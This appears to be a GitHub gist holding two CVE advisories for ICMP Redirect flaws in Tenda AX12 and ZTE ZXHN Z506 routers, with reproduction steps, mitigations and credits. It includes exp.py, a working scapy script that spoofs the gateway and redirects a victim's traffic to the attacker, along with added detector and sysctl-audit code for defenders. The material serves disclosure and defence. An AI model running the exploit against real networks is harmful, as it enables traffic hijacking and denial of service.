@Mivik
Last active July 13, 2024 13:01
ICMP Redirect attacks
# exp.py: sends one forged ICMP Redirect (type 5, code 1) to the victim
import sys

from scapy.arch import get_if_addr
from scapy.config import conf
from scapy.layers.inet import IP, ICMP
from scapy.sendrecv import sendp

if len(sys.argv) != 4:
    print(f'Usage: {sys.argv[0]} <interface> <victim IP> <server IP>')
    sys.exit(1)

iface, victim, server = sys.argv[1:]
attacker = get_if_addr(iface)      # the attacker's own address on the chosen interface
gw = conf.route.route()[2]         # the LAN's default gateway, whose address the packet impersonates

# A single ICMP Redirect (type 5, code 1: "redirect for host") claiming to come from the
# gateway and telling the victim to reach `server` via `attacker`. The quoted inner
# IP/ICMP header identifies the flow being redirected.
sendp(
    IP(src=gw, dst=victim)
    / ICMP(type=5, code=1, gw=attacker)
    / IP(src=victim, dst=server)
    / ICMP(),
    iface=iface,
)

Metadata

CVE ID: CVE-2024-40503

CWE-940: Improper Verification of Source of a Communication Channel

Description

Tenda AX12 router (firmware version V16.03.49.18_cn) has been confirmed to be vulnerable to ICMP Redirect attacks. An attacker can hijack the victim's traffic by sending ICMP Redirect packets to the victim's device.

Please refer to the paper [1] for more details.

Reproduction

Environment:

  • Attacker and victim are in the same LAN.
  • Victim accepts ICMP Redirect packets (which is the default on most Linux distributions).

Steps:

  1. Under initial conditions, the victim's traffic is routed through the gateway. ping 8.8.8.8 should succeed on the victim's machine, and ip route get 8.8.8.8 should yield the gateway's IP address.
  2. The attacker sends an ICMP Redirect packet (exp.py) to the victim, redirecting traffic to the attacker's IP address.
  3. The victim's traffic is now routed through the attacker. ip route get 8.8.8.8 would now yield the attacker's IP address, and the connection to 8.8.8.8 would fail.

The steps above demonstrate a DoS attack. This vulnerability can also be exploited to intercept the victim's traffic.
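A defender-side counterpart to the attack described above, added here as an example and not part of the original gist: a pure-Python inspector that parses Ethernet/IPv4 frames, picks out ICMP type-5 redirects, and flags the two things a forged redirect like the one exp.py emits gets wrong on a monitored LAN, namely that the frame claims the gateway's IP address but does not carry the gateway's Ethernet address, and that the advertised next hop is not a router the operator knows about. The gateway address, its MAC, the router allow-list and both sample frames are constructed for this example; the frame builder exists only to produce fixture bytes for the checks.

```python
"""Passive detector for spoofed IPv4 ICMP redirects, standard library only."""
import struct
from dataclasses import dataclass, field
from typing import List, Optional

# Assumed facts about the protected LAN (constructed for this example).
GATEWAY_IP = "192.168.1.1"
GATEWAY_MAC = "aa:bb:cc:00:00:01"
KNOWN_ROUTERS = {"192.168.1.1", "192.168.1.2"}   # hosts allowed to appear as a redirect next hop

ETH_TYPE_IPV4 = 0x0800
IPPROTO_ICMP = 1
ICMP_REDIRECT = 5


@dataclass
class RedirectAlert:
    src_mac: str
    src_ip: str
    new_gateway: str
    redirected_dst: str
    reasons: List[str] = field(default_factory=list)


def _mac_str(b: bytes) -> str:
    return ":".join(f"{x:02x}" for x in b)


def _ip_str(b: bytes) -> str:
    return ".".join(str(x) for x in b)


def inspect_frame(frame: bytes, gateway_ip: str = GATEWAY_IP, gateway_mac: str = GATEWAY_MAC,
                  known_routers=KNOWN_ROUTERS) -> Optional[RedirectAlert]:
    """Return an alert if `frame` is an ICMP redirect the real gateway would not have sent.

    The IP source of a redirect is easy to forge; the Ethernet source of the frame is
    compared against the gateway's inventoried MAC, and the advertised next hop against
    the list of routers that may legitimately be named.
    """
    if len(frame) < 14 or struct.unpack("!H", frame[12:14])[0] != ETH_TYPE_IPV4:
        return None
    src_mac = _mac_str(frame[6:12])
    ip = frame[14:]
    if len(ip) < 20:
        return None
    ihl = (ip[0] & 0x0F) * 4
    if ip[9] != IPPROTO_ICMP or len(ip) < ihl + 8 + 20:
        return None                                   # not ICMP, or too short to be a redirect
    icmp = ip[ihl:]
    if icmp[0] != ICMP_REDIRECT:
        return None
    src_ip = _ip_str(ip[12:16])
    new_gw = _ip_str(icmp[4:8])                       # "gateway address" field of the redirect
    inner = icmp[8:]                                  # header of the datagram being redirected
    alert = RedirectAlert(src_mac, src_ip, new_gw, _ip_str(inner[16:20]))
    if src_ip != gateway_ip:
        alert.reasons.append("redirect does not come from the configured gateway")
    elif src_mac != gateway_mac.lower():
        alert.reasons.append("claims the gateway's IP but Ethernet source is not the gateway's MAC")
    if new_gw not in known_routers:
        alert.reasons.append(f"advertised next hop {new_gw} is not a known router")
    return alert if alert.reasons else None


def scan(frames) -> List[RedirectAlert]:
    return [a for a in (inspect_frame(f) for f in frames) if a]


# ---- fixture construction (test data only) ----------------------------------
def _checksum(data: bytes) -> int:
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack(f"!{len(data) // 2}H", data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF


def _ipv4_header(src: str, dst: str, total_len: int) -> bytes:
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, total_len, 0, 0, 64, IPPROTO_ICMP, 0,
                      bytes(int(o) for o in src.split(".")), bytes(int(o) for o in dst.split(".")))
    return hdr[:10] + struct.pack("!H", _checksum(hdr)) + hdr[12:]


def constructed_redirect_frame(src_mac: str, src_ip: str, victim_mac: str, victim_ip: str,
                               new_gw: str, redirected_dst: str) -> bytes:
    """Constructed Ethernet/IPv4/ICMP type-5 frame of the shape exp.py sends (fixture only)."""
    inner = _ipv4_header(victim_ip, redirected_dst, 28) + bytes(8)   # quoted datagram: IP + 8 bytes
    icmp = struct.pack("!BBH4s", ICMP_REDIRECT, 1, 0, bytes(int(o) for o in new_gw.split("."))) + inner
    icmp = icmp[:2] + struct.pack("!H", _checksum(icmp)) + icmp[4:]
    eth = (bytes.fromhex(victim_mac.replace(":", "")) + bytes.fromhex(src_mac.replace(":", ""))
           + struct.pack("!H", ETH_TYPE_IPV4))
    return eth + _ipv4_header(src_ip, victim_ip, 20 + len(icmp)) + icmp


VICTIM_MAC, VICTIM_IP = "aa:bb:cc:00:00:10", "192.168.1.10"
# Spoofed: IP source says "gateway", Ethernet source is another host, next hop is that host.
SPOOFED = constructed_redirect_frame("aa:bb:cc:00:00:99", GATEWAY_IP, VICTIM_MAC, VICTIM_IP,
                                     "192.168.1.99", "8.8.8.8")
# Legitimate: sent from the real gateway's MAC and pointing at another known router.
LEGIT = constructed_redirect_frame(GATEWAY_MAC, GATEWAY_IP, VICTIM_MAC, VICTIM_IP,
                                   "192.168.1.2", "10.0.0.5")

if __name__ == "__main__":
    for a in scan([SPOOFED, LEGIT]):
        print(f"ALERT from {a.src_mac} ({a.src_ip}): {a.redirected_dst} -> {a.new_gateway}; "
              + "; ".join(a.reasons))
```

In practice the frames come from a pcap reader or a capture socket on a monitoring port, and the gateway MAC comes from an inventory rather than from ARP at run time; the point is that a forged redirect survives the IP-level checks a host makes (the source really is the gateway's address) but not an L2 check against the gateway's known hardware address.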

Workaround

Until the vendor fixes this vulnerability, users can disable ICMP Redirect acceptance on their devices. On Linux, this can be done by running sysctl -w net.ipv4.conf.all.accept_redirects=0.
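The one-liner above turns off only the conf.all knob. On Linux, for an interface with forwarding disabled (the normal host case), the kernel accepts a redirect if either conf.all or conf.<iface>.accept_redirects is 1, and only with forwarding enabled does it require both (Documentation/networking/ip-sysctl.rst); conf.default governs interfaces created later. An added audit script, not part of the original advisory, that parses sysctl -a style output and reports which interfaces still accept redirects together with the commands needed; SAMPLE_SYSCTL is a constructed excerpt in which the advisory's command has already been run.

```python
"""Audit Linux IPv4 ICMP-redirect sysctls from `sysctl -a` output (standard library only)."""
import re
from typing import Dict, List, Tuple

# Constructed `sysctl -a` excerpt: conf.all has been set to 0 as the advisory suggests,
# but the interface-level knob on eth0 and the template for future interfaces are still 1.
SAMPLE_SYSCTL = """\
net.ipv4.ip_forward = 0
net.ipv4.conf.all.accept_redirects = 0
net.ipv4.conf.default.accept_redirects = 1
net.ipv4.conf.eth0.accept_redirects = 1
net.ipv4.conf.eth0.forwarding = 0
net.ipv4.conf.lo.accept_redirects = 1
net.ipv4.conf.lo.forwarding = 0
"""

_LINE = re.compile(r"^\s*([\w.\-]+)\s*=\s*(\S+)\s*$")
_IFACE = re.compile(r"^net\.ipv4\.conf\.([^.]+)\.")


def parse_sysctl(text: str) -> Dict[str, str]:
    """Turn `key = value` lines (as printed by `sysctl -a`) into a dict."""
    values = {}
    for line in text.splitlines():
        m = _LINE.match(line)
        if m:
            values[m.group(1)] = m.group(2)
    return values


def _on(values: Dict[str, str], key: str) -> bool:
    return values.get(key, "0") == "1"


def interfaces(values: Dict[str, str]) -> List[str]:
    """Interface names present under net.ipv4.conf, minus the all/default pseudo-entries."""
    names = {m.group(1) for m in map(_IFACE.match, values) if m}
    return sorted(names - {"all", "default"})


def accepts_redirects(values: Dict[str, str], iface: str) -> bool:
    """Effective accept_redirects for one interface, following ip-sysctl.rst:
    forwarding on  -> accepted only if conf.all AND conf.<iface> are 1;
    forwarding off -> accepted if conf.all OR conf.<iface> is 1."""
    all_on = _on(values, "net.ipv4.conf.all.accept_redirects")
    if_on = _on(values, f"net.ipv4.conf.{iface}.accept_redirects")
    forwarding = _on(values, f"net.ipv4.conf.{iface}.forwarding")
    return (all_on and if_on) if forwarding else (all_on or if_on)


def audit(values: Dict[str, str]) -> Tuple[List[str], List[str]]:
    """Return (findings, remediation commands) for the parsed sysctl state."""
    findings, fixes = [], []
    for iface in interfaces(values):
        if iface == "lo":               # loopback never sees a redirect from the LAN
            continue
        if accepts_redirects(values, iface):
            findings.append(f"{iface}: still accepts ICMP redirects")
            fixes.append(f"sysctl -w net.ipv4.conf.{iface}.accept_redirects=0")
    if _on(values, "net.ipv4.conf.all.accept_redirects"):
        findings.append("all: global accept_redirects is on")
        fixes.append("sysctl -w net.ipv4.conf.all.accept_redirects=0")
    if _on(values, "net.ipv4.conf.default.accept_redirects"):
        findings.append("default: interfaces created later will accept redirects")
        fixes.append("sysctl -w net.ipv4.conf.default.accept_redirects=0")
    return findings, fixes


if __name__ == "__main__":
    found, commands = audit(parse_sysctl(SAMPLE_SYSCTL))
    for f in found:
        print("FINDING:", f)
    for c in commands:
        print("FIX:    ", c)
```

The emitted sysctl -w commands take effect immediately but do not survive a reboot; the same keys go into a file under /etc/sysctl.d to make them persistent. Note that net.ipv4.conf.*.secure_redirects is not a mitigation for this attack: it only restricts acceptance to redirects that appear to come from a current gateway, which is exactly what exp.py forges with its spoofed source address.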

Credit

Shiyao Guo, Ke Xu, Xuewei Feng, Qi Li, Yuxiang Yang

Footnotes

  1. Feng, Xuewei, et al. "Man-in-the-middle attacks without rogue AP: when WPAs meet ICMP redirects." 2023 IEEE Symposium on Security and Privacy (SP). IEEE, 2023.

Metadata

CVE ID: CVE-2024-40504

CWE-940: Improper Verification of Source of a Communication Channel

Description

ZTE ZXHN Z506 router (firmware version V1.0.0.2B2.8000) has been confirmed to be vulnerable to ICMP Redirect attacks. An attacker can hijack the victim's traffic by sending ICMP Redirect packets to the victim's device.

Please refer to the paper [1] for more details.

Reproduction

Environment:

  • Attacker and victim are in the same LAN.
  • Victim accepts ICMP Redirect packets (which is the default on most Linux distributions).

Steps:

  1. Under initial conditions, the victim's traffic is routed through the gateway. ping 8.8.8.8 should succeed on the victim's machine, and ip route get 8.8.8.8 should yield the gateway's IP address.
  2. The attacker sends an ICMP Redirect packet (exp.py) to the victim, redirecting traffic to the attacker's IP address.
  3. The victim's traffic is now routed through the attacker. ip route get 8.8.8.8 would now yield the attacker's IP address, and the connection to 8.8.8.8 would fail.

The steps above demonstrate a DoS attack. This vulnerability can also be exploited to intercept the victim's traffic.

Workaround

Until the vendor fixes this vulnerability, users can disable ICMP Redirect acceptance on their devices. On Linux, this can be done by running sysctl -w net.ipv4.conf.all.accept_redirects=0.

Credit

Shiyao Guo, Ke Xu, Xuewei Feng, Qi Li, Yuxiang Yang

Footnotes

  1. Feng, Xuewei, et al. "Man-in-the-middle attacks without rogue AP: when WPAs meet ICMP redirects." 2023 IEEE Symposium on Security and Privacy (SP). IEEE, 2023.
